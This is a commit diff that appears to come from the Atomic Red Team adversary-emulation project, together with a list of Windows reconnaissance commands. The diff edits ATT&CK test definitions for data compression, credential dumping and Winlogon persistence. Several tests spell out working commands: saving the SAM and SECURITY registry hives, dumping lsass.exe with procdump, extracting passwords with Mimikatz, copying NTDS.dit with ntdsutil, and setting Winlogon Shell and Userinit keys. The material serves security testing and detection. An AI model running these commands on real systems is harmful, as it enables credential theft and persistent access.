reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
wmic useraccount list
wmic useraccount get /ALL
wmic startup list brief
wmic share list
wmic service get name,displayname,pathname,startmode
wmic process list brief
wmic process get caption,executablepath,commandline
wmic qfe get description,installedOn /format:csv
arp -a
whoami
ipconfig /displaydns
route print
netsh advfirewall show allprofiles
systeminfo
qwinsta
quser
Gemfile.lock
+5 -5
View File
@@ -20,7 +20,7 @@ GEM
colorator (1.1.0)
commonmarker (0.17.9)
ruby-enum (~> 0.5)
concurrent-ruby (1.1.3)
concurrent-ruby (1.0.5)
dnsruby (1.60.2)
em-websocket (0.5.1)
eventmachine (>= 0.12.9)
@@ -190,7 +190,7 @@ GEM
jekyll-seo-tag (~> 2.0)
jekyll-titles-from-headings (0.5.1)
jekyll (~> 3.3)
jekyll-watch (2.1.2)
jekyll-watch (2.0.0)
listen (~> 3.0)
jemoji (0.9.0)
activesupport (~> 4.0, >= 4.2.9)
@@ -215,7 +215,7 @@ GEM
mini_portile2 (~> 2.3.0)
octokit (4.9.0)
sawyer (~> 0.8.0, >= 0.5.3)
pathutil (0.16.2)
pathutil (0.16.1)
forwardable-extended (~> 2.6)
public_suffix (2.0.5)
rb-fsevent (0.10.3)
@@ -225,9 +225,9 @@ GEM
ruby-enum (0.7.2)
i18n
ruby_dep (1.5.0)
rubyzip (1.2.2)
rubyzip (1.2.1)
safe_yaml (1.0.4)
sass (3.7.2)
sass (3.5.6)
sass-listen (~> 4.0.0)
sass-listen (4.0.0)
rb-fsevent (~> 0.9, >= 0.9.4)
README.md
+1 -2
View File
@@ -38,7 +38,7 @@ Join the community on Slack at [https://atomicredteam.slack.com](https://atomicr
## Getting Started
* [Getting Started With Atomic Tests](https://atomicredteam.io/testing)
* [Quick Start: Using Atomic Red Team to test your security](#quick-start-using-atomic-red-team-to-test-your-security)
* Peruse the [Complete list of Atomic Tests](atomics/index.md) and the [ATT&CK Matrix](atomics/matrix.md)
- Windows [Tests](atomics/windows-index.md) and [Matrix](atomics/windows-matrix.md)
- macOS [Tests](atomics/macos-index.md) and [Matrix](atomics/macos-matrix.md)
@@ -49,7 +49,6 @@ Join the community on Slack at [https://atomicredteam.slack.com](https://atomicr
* [Bonus APIs: Ruby ATT&CK API](#bonus-apis-ruby-attck-api)
* [Execution Frameworks](https://github.com/redcanaryco/atomic-red-team/blob/master/execution-frameworks)
* Have questions? Join the community on Slack at [https://atomicredteam.slack.com](https://atomicredteam.slack.com)
* Need a Slack invitation? Grab one at [https://slack.atomicredteam.io/](https://slack.atomicredteam.io/)
## Code of Conduct
atomic_red_team/atomic_red_team.rb
+2 -46
View File
@@ -116,58 +116,14 @@ class AtomicRedTeam
when 'manual'
raise("`atomic_tests[#{i}].executor.steps` element is required") unless executor.has_key?('steps')
raise("`atomic_tests[#{i}].executor.steps` element must be a string") unless executor['steps'].is_a?(String)
validate_input_args_vs_string! input_args: (atomic['input_arguments'] || {}).keys,
string: executor['steps'],
string_description: "atomic_tests[#{i}].executor.steps"
when 'command_prompt', 'sh', 'bash', 'powershell'
raise("`atomic_tests[#{i}].executor.command` element is required") unless executor.has_key?('command')
raise("`atomic_tests[#{i}].executor.command` element must be a string") unless executor['command'].is_a?(String)
validate_input_args_vs_string! input_args: (atomic['input_arguments'] || {}).keys,
string: executor['command'],
string_description: "atomic_tests[#{i}].executor.command"
else
raise("`atomic_tests[#{i}].executor.name` '#{executor['name']}' must be one of #{valid_executor_types.join(', ')}")
end
validate_no_todos!(atomic, path: "atomic_tests[#{i}]")
end
end
#
# Validates that the arguments (specified in "#{arg}" format) in a string
# match the input_arguments for a test
#
def validate_input_args_vs_string!(input_args:, string:, string_description:)
input_args_in_string = string.scan(/#\{([^}]+)\}/).to_a.flatten
input_args_in_string_and_not_specced = input_args_in_string - input_args
if input_args_in_string_and_not_specced.count > 0
raise("`#{string_description}` contains args #{input_args_in_string_and_not_specced} not in input_arguments")
end
input_args_in_spec_not_string = input_args - input_args_in_string
if input_args_in_string_and_not_specced.count > 0
raise("`atomic_tests[#{i}].input_arguments` contains args #{input_args_in_spec_not_string} not in command")
end
end
#
# Recursively validates that the hash (or something) doesn't contain a TODO
#
def validate_no_todos!(hashish, path:)
if hashish.is_a? String
raise "`#{path}` contains a TODO" if hashish.include? 'TODO'
elsif hashish.is_a? Array
hashish.each_with_index do |item, i|
validate_no_todos! item, path: "#{path}[#{i}]"
end
elsif hashish.is_a? Hash
hashish.each do |k, v|
validate_no_todos! v, path: "#{path}.#{k}"
end
end
end
end
atomic_red_team/enterprise-attack.json
+72222 -102173
View File
File diff suppressed because one or more lines are too long
atomics/T1002/T1002.md
+25 -54
View File
@@ -1,6 +1,16 @@
# T1002 - Data Compressed
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1002)
<blockquote>An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. The compression is done separately from the exfiltration channel and is performed using a custom program or algorithm, or a more common compression library or utility such as 7zip, RAR, ZIP, or zlib.</blockquote>
<blockquote>An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. The compression is done separately from the exfiltration channel and is performed using a custom program or algorithm, or a more common compression library or utility such as 7zip, RAR, ZIP, or zlib.
Detection: Compression software and compressed files can be detected in many ways. Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known compression utilities. This may yield a significant amount of benign events, depending on how systems in the environment are typically used.
If the communications channel is unencrypted, compressed files can be detected in transit during exfiltration with a network intrusion detection or data loss prevention system analyzing file headers. (Citation: Wikipedia File Header Signatures)
Platforms: Linux, macOS, Windows
Data Sources: File monitoring, Binary file metadata, Process command-line parameters, Process monitoring
Requires Network: No</blockquote>
## Atomic Tests
@@ -8,17 +18,13 @@
- [Atomic Test #2 - Compress Data for Exfiltration With Rar](#atomic-test-2---compress-data-for-exfiltration-with-rar)
- [Atomic Test #3 - Data Compressed - nix - zip](#atomic-test-3---data-compressed---nix---zip)
- [Atomic Test #4 - Data Compressed - nix - gzip Single File](#atomic-test-4---data-compressed---nix---gzip-single-file)
- [Atomic Test #5 - Data Compressed - nix - tar Folder or File](#atomic-test-5---data-compressed---nix---tar-folder-or-file)
- [Atomic Test #3 - Data Compressed - nix](#atomic-test-3---data-compressed---nix)
<br/>
## Atomic Test #1 - Compress Data for Exfiltration With PowerShell
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration
TODO
**Supported Platforms:** Windows
@@ -37,7 +43,7 @@ dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
<br/>
## Atomic Test #2 - Compress Data for Exfiltration With Rar
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration
TODO
**Supported Platforms:** Windows
@@ -55,57 +61,22 @@ rar a -r #{output_file} #{input_file}
<br/>
<br/>
## Atomic Test #3 - Data Compressed - nix - zip
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard zip compression.
## Atomic Test #3 - Data Compressed - nix
TODO
**Supported Platforms:** Linux, macOS
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_files | Path that should be compressed into our output file, may include wildcards | Path | /tmp/victim-files/*|
| output_file | Path that should be output as a zip archive | Path | /tmp/victim-files.zip|
#### Run it with `sh`!
```
zip #{output_file} #{input_files}
```
<br/>
<br/>
## Atomic Test #4 - Data Compressed - nix - gzip Single File
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression.
**Supported Platforms:** Linux, macOS
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | Path that should be compressed | Path | /tmp/victim-gzip.txt|
#### Run it with `sh`!
```
gzip -f #{input_file}
```
<br/>
<br/>
## Atomic Test #5 - Data Compressed - nix - tar Folder or File
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression.
**Supported Platforms:** Linux, macOS
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file_folder | Path that should be compressed | Path | /tmp/victim-files/|
| output_file | File that should be output | Path | /tmp/victim-files.tar.gz|
#### Run it with `sh`!
```
tar -cvzf #{output_file} #{input_file_folder}
mkdir /tmp/victim-files
cd /tmp/victim-files
touch a b c d e f g
echo "This file will be gzipped" > /tmp/victim-gzip.txt
echo "This file will be tarred" > /tmp/victim-tar.txt
zip /tmp/victim-files.zip /tmp/victim-files/*
gzip -f /tmp/victim-gzip.txt
tar -cvzf /tmp/victim-files.tar.gz /tmp/victim-files/
tar -cvzf /tmp/victim-tar.tar.gz
```
<br/>
atomics/T1002/T1002.yaml
+13 -50
View File
@@ -5,7 +5,7 @@ display_name: Data Compressed
atomic_tests:
- name: Compress Data for Exfiltration With PowerShell
description: |
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration
TODO
supported_platforms:
- windows
input_arguments:
@@ -24,7 +24,7 @@ atomic_tests:
- name: Compress Data for Exfiltration With Rar
description: |
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration
TODO
supported_platforms:
- windows
input_arguments:
@@ -41,58 +41,21 @@ atomic_tests:
command: |
rar a -r #{output_file} #{input_file}
- name: Data Compressed - nix - zip
- name: Data Compressed - nix
description: |
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard zip compression.
TODO
supported_platforms:
- linux
- macos
input_arguments:
input_files:
description: Path that should be compressed into our output file, may include wildcards
type: Path
default: /tmp/victim-files/*
output_file:
description: Path that should be output as a zip archive
type: Path
default: /tmp/victim-files.zip
executor:
name: sh
command: |
zip #{output_file} #{input_files}
- name: Data Compressed - nix - gzip Single File
description: |
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression.
supported_platforms:
- linux
- macos
input_arguments:
input_file:
description: Path that should be compressed
type: Path
default: /tmp/victim-gzip.txt
executor:
name: sh
command: |
gzip -f #{input_file}
- name: Data Compressed - nix - tar Folder or File
description: |
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression.
supported_platforms:
- linux
- macos
input_arguments:
input_file_folder:
description: Path that should be compressed
type: Path
default: /tmp/victim-files/
output_file:
description: File that should be output
type: Path
default: /tmp/victim-files.tar.gz
executor:
name: sh
command: |
tar -cvzf #{output_file} #{input_file_folder}
mkdir /tmp/victim-files
cd /tmp/victim-files
touch a b c d e f g
echo "This file will be gzipped" > /tmp/victim-gzip.txt
echo "This file will be tarred" > /tmp/victim-tar.txt
zip /tmp/victim-files.zip /tmp/victim-files/*
gzip -f /tmp/victim-gzip.txt
tar -cvzf /tmp/victim-files.tar.gz /tmp/victim-files/
tar -cvzf /tmp/victim-tar.tar.gz
atomics/T1003/T1003.md
+48 -139
View File
@@ -4,21 +4,17 @@
Several of the tools mentioned in this technique may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.
### Windows
===SAM (Security Accounts Manager)===
#### SAM (Security Accounts Manager)
The SAM is a database file that contains local accounts for the host, typically those found with the net user command. To enumerate the SAM database, system level access is required.
The SAM is a database file that contains local accounts for the host, typically those found with the net user command. To enumerate the SAM database, system level access is required.
 
A number of tools can be used to retrieve the SAM file through in-memory techniques:
* pwdumpx.exe
* [gsecdump](https://attack.mitre.org/software/S0008)
* [Mimikatz](https://attack.mitre.org/software/S0002)
* gsecdump
* Mimikatz
* secretsdump.py
Alternatively, the SAM can be extracted from the Registry with [Reg](https://attack.mitre.org/software/S0075):
Alternatively, the SAM can be extracted from the Registry with Reg:
* <code>reg save HKLM\sam sam</code>
* <code>reg save HKLM\system system</code>
@@ -29,32 +25,30 @@ Rid 500 account is the local, in-built administrator.
Rid 501 is the guest account.
User accounts start with a RID of 1,000+.
#### Cached Credentials
===Cached Credentials===
The DCC2 (Domain Cached Credentials version 2) hash, used by Windows Vista and newer caches credentials when the domain controller is unavailable. The number of default cached credentials varies, and this number can be altered per system. This hash does not allow pass-the-hash style attacks.
The DCC2 (Domain Cached Credentials version 2) hash, used by Windows Vista and newer caches credentials when the domain controller is unavailable. The number of default cached credentials varies, and this number can be altered per system. This hash does not allow pass-the-hash style attacks.
 
A number of tools can be used to retrieve the SAM file through in-memory techniques.
* pwdumpx.exe
* [gsecdump](https://attack.mitre.org/software/S0008)
* [Mimikatz](https://attack.mitre.org/software/S0002)
* gsecdump
* Mimikatz
Alternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials.
Notes:
Cached credentials for Windows Vista are derived using PBKDF2.
#### Local Security Authority (LSA) Secrets
===Local Security Authority (LSA) Secrets===
With SYSTEM access to a host, the LSA secrets often allows trivial access from a local account to domain-based account credentials. The Registry is used to store the LSA secrets.
 
When services are run under the context of local or domain users, their passwords are stored in the Registry. If auto-logon is enabled, this information will be stored in the Registry as well.
 
A number of tools can be used to retrieve the SAM file through in-memory techniques.
* pwdumpx.exe
* [gsecdump](https://attack.mitre.org/software/S0008)
* [Mimikatz](https://attack.mitre.org/software/S0002)
* gsecdump
* Mimikatz
* secretsdump.py
Alternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials.
@@ -63,74 +57,85 @@ Notes:
The passwords extracted by his mechanism are UTF-16 encoded, which means that they are returned in plaintext.
Windows 10 adds protections for LSA Secrets described in Mitigation.
#### NTDS from Domain Controller
===NTDS from Domain Controller===
Active Directory stores information about members of the domain including devices and users to verify credentials and define access rights. The Active Directory domain database is stored in the NTDS.dit file. By default the NTDS file will be located in %SystemRoot%\NTDS\Ntds.dit of a domain controller. (Citation: Wikipedia Active Directory)
The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.
 
* Volume Shadow Copy
* secretsdump.py
* Using the in-built Windows tool, ntdsutil.exe
* Invoke-NinjaCopy
#### Group Policy Preference (GPP) Files
===Group Policy Preference (GPP) Files===
Group Policy Preferences (GPP) are tools that allowed administrators to create domain policies with embedded credentials. These policies, amongst other things, allow administrators to set local accounts.
 
These group policies are stored in SYSVOL on a domain controller, this means that any domain user can view the SYSVOL share and decrypt the password (the AES private key was leaked on-line. (Citation: Microsoft GPP Key) (Citation: SRD GPP)
 
The following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files:
 
* Metasploits post exploitation module: "post/windows/gather/credentials/gpp"
* Get-GPPPassword (Citation: Obscuresecurity Get-GPPPassword)
* gpprefdecrypt.py
 
Notes:
On the SYSVOL share, the following can be used to enumerate potential XML files.
dir /s * .xml
dir /s *.xml
#### Service Principal Names (SPNs)
===Service Principle Names (SPNs)===
See [Kerberoasting](https://attack.mitre.org/techniques/T1208).
See Kerberoasting.
#### Plaintext Credentials
===Plaintext Credentials===
After a user logs on to a system, a variety of credentials are generated and stored in the Local Security Authority Subsystem Service (LSASS) process in memory. These credentials can be harvested by a administrative user or SYSTEM.
 
SSPI (Security Support Provider Interface) functions as a common interface to several Security Support Providers (SSPs): A Security Support Provider is a dynamic-link library (DLL) that makes one or more security packages available to applications.
The following SSPs can be used to access credentials:
 
Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.
Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges. (Citation: TechNet Blogs Credential Protection)
Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
CredSSP:  Provides SSO and Network Level Authentication for Remote Desktop Services. (Citation: Microsoft CredSSP)
 
The following tools can be used to enumerate credentials:
* [Windows Credential Editor](https://attack.mitre.org/software/S0005)
* [Mimikatz](https://attack.mitre.org/software/S0002)
 
* Windows Credential Editor
* Mimikatz
 
As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.
 
For example, on the target host use procdump:
* <code>procdump -ma lsass.exe lsass_dump</code>
 
Locally, mimikatz can be run:
* <code>sekurlsa::Minidump lsassdump.dmp</code>
* <code>sekurlsa::logonPasswords</code>
#### DCSync
===DCSync===
DCSync is a variation on credential dumping which can be used to acquire sensitive information from a domain controller. Rather than executing recognizable malicious code, the action works by abusing the domain controller's application programming interface (API) (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller. Any members of the Administrators, Domain Admins, Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data (Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a Golden Ticket for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1097) (Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in [Account Manipulation](https://attack.mitre.org/techniques/T1098). (Citation: InsiderThreat ChangeNTLM July 2017) DCSync functionality has been included in the "lsadump" module in Mimikatz. (Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol. (Citation: Microsoft NRPC Dec 2017)
DCSync is a variation on credential dumping which can be used to acquire sensitive information from a domain controller. Rather than executing recognizable malicious code, the action works by abusing the domain controller's application programming interface (API) (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller. Any members of the Administrators, Domain Admins, Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data (Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a Golden Ticket for use in Pass the Ticket (Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in Account Manipulation. (Citation: InsiderThreat ChangeNTLM July 2017) DCSync functionality has been included in the "lsadump" module in Mimikatz. (Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol. (Citation: Microsoft NRPC Dec 2017)
### Linux
Detection: Common credential dumpers such as Mimikatz access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective Process Injection to reduce potential indicators of malicious activity.
#### Proc filesystem
Hash dumpers open the Security Accounts Manager (SAM) on the local file system (%SystemRoot%/system32/config/SAM) or create a dump of the Registry SAM key to access stored account password hashes. Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised Valid Accounts in-use by adversaries may help as well.
The /proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either usage or brute force attacks, respectively. This functionality has been implemented in the [MimiPenguin](https://attack.mitre.org/software/S0179), an open source tool inspired by [Mimikatz](https://attack.mitre.org/software/S0002). The tool dumps process memory, then harvests passwords and hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use memory to store such authentication artifacts.</blockquote>
On Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process.
Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module, (Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.
Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync. (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Note: Domain controllers may not log replication requests originating from the default domain controller account. (Citation: Harmj0y DCSync Sept 2015). Also monitor for network protocols (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests (Citation: Microsoft SAMR) from IPs not associated with known domain controllers. (Citation: AdSecurity DCSync Sept 2015)
Platforms: Windows
Data Sources: API monitoring, Process command-line parameters, Process monitoring, PowerShell logs
Permissions Required: Administrator, SYSTEM
Contributors: Vincent Le Toux, Ed Williams, Trustwave, SpiderLabs</blockquote>
## Atomic Tests
@@ -142,14 +147,6 @@ The /proc filesystem on Linux contains a great deal of information regarding the
- [Atomic Test #4 - Registry dump of SAM, creds, and secrets](#atomic-test-4---registry-dump-of-sam-creds-and-secrets)
- [Atomic Test #5 - Dump LSASS.exe Memory using ProcDump](#atomic-test-5---dump-lsassexe-memory-using-procdump)
- [Atomic Test #6 - Dump LSASS.exe Memory using Windows Task Manager](#atomic-test-6---dump-lsassexe-memory-using-windows-task-manager)
- [Atomic Test #7 - Offline Credential Theft With Mimikatz](#atomic-test-7---offline-credential-theft-with-mimikatz)
- [Atomic Test #8 - Dump Active Directory Database with NTDSUtil](#atomic-test-8---dump-active-directory-database-with-ntdsutil)
<br/>
@@ -216,91 +213,3 @@ reg save HKLM\system system
reg save HKLM\security security
```
<br/>
<br/>
## Atomic Test #5 - Dump LSASS.exe Memory using ProcDump
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump. The tool may be downloaded from https://docs.microsoft.com/en-us/sysinternals/downloads/procdump.
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where resulting dump should be placed | Path | lsass_dump.dmp|
#### Run it with `command_prompt`!
```
procdump.exe -accepteula -ma lsass.exe #{output_file}
```
<br/>
<br/>
## Atomic Test #6 - Dump LSASS.exe Memory using Windows Task Manager
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
Manager and administrative permissions.
**Supported Platforms:** Windows
#### Run it with these steps!
1. Open Task Manager:
On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
on the task bar and selecting "Task Manager".
2. Select lsass.exe:
If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe
and select it for manipulation.
3. Dump lsass.exe memory:
Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file.
<br/>
<br/>
## Atomic Test #7 - Offline Credential Theft With Mimikatz
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz.
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | Path where resulting dump should be placed | Path | lsass_dump.dmp|
#### Run it with these steps!
1. Open Mimikatz:
Execute `mimikatz` at a command prompt.
2. Select a Memory Dump:
Within the Mimikatz interactive shell, execute `sekurlsa::minidump #{input_file}`
3. Obtain Credentials:
Within the Mimikatz interactive shell, execute `sekurlsa::logonpasswords full`
<br/>
<br/>
## Atomic Test #8 - Dump Active Directory Database with NTDSUtil
The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of
subsequent domain controllers without the need of network-based replication.
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_folder | Path where resulting dump should be placed | Path | C:\Atomic_Red_Team|
#### Run it with `command_prompt`!
```
ntdsutil “ac i ntds” “ifm” “create full #{output_folder} q q
```
<br/>
atomics/T1003/T1003.yaml
-77
View File
@@ -55,80 +55,3 @@ atomic_tests:
reg save HKLM\sam sam
reg save HKLM\system system
reg save HKLM\security security
- name: Dump LSASS.exe Memory using ProcDump
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump. The tool may be downloaded from https://docs.microsoft.com/en-us/sysinternals/downloads/procdump.
supported_platforms:
- windows
input_arguments:
output_file:
description: Path where resulting dump should be placed
type: Path
default: lsass_dump.dmp
executor:
name: command_prompt
command: |
procdump.exe -accepteula -ma lsass.exe #{output_file}
- name: Dump LSASS.exe Memory using Windows Task Manager
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
Manager and administrative permissions.
supported_platforms:
- windows
executor:
name: manual
steps: |
1. Open Task Manager:
On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
on the task bar and selecting "Task Manager".
2. Select lsass.exe:
If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe
and select it for manipulation.
3. Dump lsass.exe memory:
Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file.
- name: Offline Credential Theft With Mimikatz
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz.
supported_platforms:
- windows
input_arguments:
input_file:
description: Path where resulting dump should be placed
type: Path
default: lsass_dump.dmp
executor:
name: manual
steps: |
1. Open Mimikatz:
Execute `mimikatz` at a command prompt.
2. Select a Memory Dump:
Within the Mimikatz interactive shell, execute `sekurlsa::minidump #{input_file}`
3. Obtain Credentials:
Within the Mimikatz interactive shell, execute `sekurlsa::logonpasswords full`
- name: Dump Active Directory Database with NTDSUtil
description: |
The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of
subsequent domain controllers without the need of network-based replication.
supported_platforms:
- windows
input_arguments:
output_folder:
description: Path where resulting dump should be placed
type: Path
default: C:\Atomic_Red_Team
executor:
name: command_prompt
command: |
ntdsutil “ac i ntds” “ifm” “create full #{output_folder} q q
atomics/T1004/T1004.md
-76
View File
@@ -1,76 +0,0 @@
# T1004 - Winlogon Helper DLL
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1004)
<blockquote>Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in <code>HKLM\Software\[Wow6432Node\]Microsoft\Windows NT\CurrentVersion\Winlogon\</code> and <code>HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\</code> are used to manage additional helper programs and functionalities that support Winlogon. (Citation: Cylance Reg Persistence Sept 2013)
Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013)
* Winlogon\Notify - points to notification package DLLs that handle Winlogon events
* Winlogon\Userinit - points to userinit.exe, the user initialization program executed when a user logs on
* Winlogon\Shell - points to explorer.exe, the system shell executed when a user logs on
Adversaries may take advantage of these features to repeatedly execute malicious code and establish Persistence.</blockquote>
## Atomic Tests
- [Atomic Test #1 - Winlogon Shell Key Persistence - PowerShell](#atomic-test-1---winlogon-shell-key-persistence---powershell)
- [Atomic Test #2 - Winlogon Userinit Key Persistence - PowerShell](#atomic-test-2---winlogon-userinit-key-persistence---powershell)
- [Atomic Test #3 - Winlogon Notify Key Logon Persistence - PowerShell](#atomic-test-3---winlogon-notify-key-logon-persistence---powershell)
<br/>
## Atomic Test #1 - Winlogon Shell Key Persistence - PowerShell
PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe.
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| binary_to_execute | Path of binary to execute | Path | C:\Windows\System32\cmd.exe|
#### Run it with `powershell`!
```
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force
```
<br/>
<br/>
## Atomic Test #2 - Winlogon Userinit Key Persistence - PowerShell
PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe.
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| binary_to_execute | Path of binary to execute | Path | C:\Windows\System32\cmd.exe|
#### Run it with `powershell`!
```
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force
```
<br/>
<br/>
## Atomic Test #3 - Winlogon Notify Key Logon Persistence - PowerShell
PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon.
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| binary_to_execute | Path of notification package to execute | Path | C:\Windows\Temp\atomicNotificationPackage.dll|
#### Run it with `powershell`!
```
New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force
```
<br/>
atomics/T1004/T1004.yaml
-59
View File
@@ -1,59 +0,0 @@
---
attack_technique: T1004
display_name: Winlogon Helper DLL
atomic_tests:
- name: Winlogon Shell Key Persistence - PowerShell
description: |
PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe.
supported_platforms:
- windows
input_arguments:
binary_to_execute:
description: Path of binary to execute
type: Path
default: C:\Windows\System32\cmd.exe
executor:
name: powershell
command: |
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force
- name: Winlogon Userinit Key Persistence - PowerShell
description: |
PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe.
supported_platforms:
- windows
input_arguments:
binary_to_execute:
description: Path of binary to execute
type: Path
default: C:\Windows\System32\cmd.exe
executor:
name: powershell
command: |
